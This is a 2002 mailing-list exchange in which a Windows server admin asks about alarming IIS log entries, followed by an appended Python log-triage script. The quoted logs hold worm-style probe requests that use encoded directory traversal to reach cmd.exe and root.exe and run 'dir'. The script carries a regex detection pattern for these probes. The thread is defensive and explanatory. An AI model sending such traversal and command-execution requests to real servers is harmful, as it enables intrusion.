RE: !!!!URGENT - SCARY website LOGS!!!!
- From: "Sushil Bhalla" <sushilb@xxxxxxxxxxxxxxxxx>
- To: isalist@xxxxxxxxxxxxx
- Date: Wed, 27 Mar 2002 00:09:04 -0700
Thanks very much Joseph for your comments.
Actually, I would like to have W2K, E2K, ISA, ISM all on separate servers
but I have SBS which limits me to one server only. If there is a way
around this problem, please let me know. I will be very much interested in
having all the processes on separate servers.
Regards,
Sushil Bhalla
> It is not always a good idea to keep ISA on the same machine with all
> the other applications that you mentioned.
> The 404 error code says that you're OK, meaning URL not found.
>
> Joseph
>
> -----Original Message-----
> From: Sushil Bhalla [mailto:sushilb@xxxxxxxxxxxxxxxxx]
> Sent: Tuesday, March 26, 2002 10:07 PM
> To: [ISAserver.org Discussion List]
> Subject: [isalist] !!!!URGENT - SCARY website LOGS!!!!
>
> http://www.ISAserver.org
>
>
> Hello All,
>
> I have W2K, E2K, ISA2K, ISM all installed on one server.
>
> Recently I have allowed inbound HTTPServer Inbound (port 80) connection
> (through ISA PACKET FILTERING) to allow my website to be viewed and after
> going through my website logs, I got very worried.
>
> Following is what I am getting in my logs every few hours.
>
> Can someone tell me URGENTLY what kind of requests are these? Should I be
> worried? What can I do to prevent these?
>
> Thanks in advance for any help.
>
> Sushil Bhalla
>
> #Date: 2002-03-27 00:19:03
> #Fields: date time c-ip cs-username s-sitename s-computername s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status sc-win32-status sc-bytes cs-bytes time-taken cs-version cs-host cs(User-Agent) cs(Cookie) cs(Referer)
> 2002-03-27 00:19:03 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /scripts/root.exe /c+dir 404 3 3396 72 15 HTTP/1.0 www - - -
> 2002-03-27 00:19:04 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /MSADC/root.exe /c+dir 404 3 3396 70 0 HTTP/1.0 www - - -
> 2002-03-27 00:19:09 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /c/winnt/system32/cmd.exe /c+dir 404 3 3396 80 0 HTTP/1.0 www - - -
> 2002-03-27 00:19:10 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /d/winnt/system32/cmd.exe /c+dir 404 3 3396 80 16 HTTP/1.0 www - - -
> 2002-03-27 00:19:11 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 3 3396 96 16 HTTP/1.0 www - - -
> 2002-03-27 00:19:14 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 3 3396 117 0 HTTP/1.0 www - - -
> 2002-03-27 00:19:19 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 3 3396 117 0 HTTP/1.0 www - - -
> 2002-03-27 00:19:20 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /msadc/..%5c../..%5c../..%5c/..=C1=1C../..=C1=1C../..=C1=1C../winnt/system32/cmd.exe /c+dir 404 3 3396 145 0 HTTP/1.0 www - - -
> 2002-03-27 00:19:22 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /scripts/..=C1=1C../winnt/system32/cmd.exe /c+dir 404 3 3396 97 0 HTTP/1.0 www - - -
> 2002-03-27 00:19:23 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 3 3396 97 15 HTTP/1.0 www - - -
> 2002-03-27 00:19:25 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /winnt/system32/cmd.exe /c+dir 404 3 3396 97 0 HTTP/1.0 www - - -
> 2002-03-27 00:19:27 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET /winnt/system32/cmd.exe /c+dir 404 3 3396 97 16 HTTP/1.0 www - - -
>
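An added example, not part of the original messages: a small triage script for the W3C extended log format quoted in this thread. It reads column names from the `#Fields:` directive, flags requests for `cmd.exe` or `root.exe` and encoded `..` sequences, and separates probes the server rejected from any that returned a non-error status. The sample log, its addresses and the function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample in the W3C extended format shown in the post
# (field list shortened; addresses are documentation ranges).
SAMPLE_LOG = """\
#Date: 2002-03-27 00:19:03
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2002-03-27 00:19:03 192.0.2.30 GET /scripts/root.exe /c+dir 404
2002-03-27 00:19:11 192.0.2.30 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404
2002-03-27 00:20:40 198.51.100.7 GET /default.htm - 200
2002-03-27 00:21:02 203.0.113.9 GET /MSADC/root.exe /c+dir 200
2002-03-27 00:21:05 203.0.113.9 GET /index.htm - 404
"""

# Request paths that aim at a command interpreter or use encoded traversal.
PROBE = re.compile(r"(?:^|/)(?:cmd|root)\.exe$|\.\.(?:%5c|%2f|\\|/)", re.IGNORECASE)


def parse_w3c(text):
    """Yield one dict per entry, using the #Fields directive for column names."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):  # skip truncated or mail-wrapped lines
                yield dict(zip(fields, values))


def triage(text):
    """Group probe requests by client IP and split them by outcome."""
    report = defaultdict(lambda: {"rejected": 0, "investigate": []})
    for entry in parse_w3c(text):
        if not PROBE.search(entry["cs-uri-stem"]):
            continue
        if entry["sc-status"].startswith(("4", "5")):
            report[entry["c-ip"]]["rejected"] += 1  # server refused the request
        else:
            report[entry["c-ip"]]["investigate"].append(
                (entry["date"], entry["time"], entry["cs-uri-stem"], entry["sc-status"]))
    return dict(report)


if __name__ == "__main__":
    for ip, result in triage(SAMPLE_LOG).items():
        print(ip, result)
```

Log lines that an e-mail client has wrapped do not match the field count and are skipped, so rejoin them or run the script against the original log file.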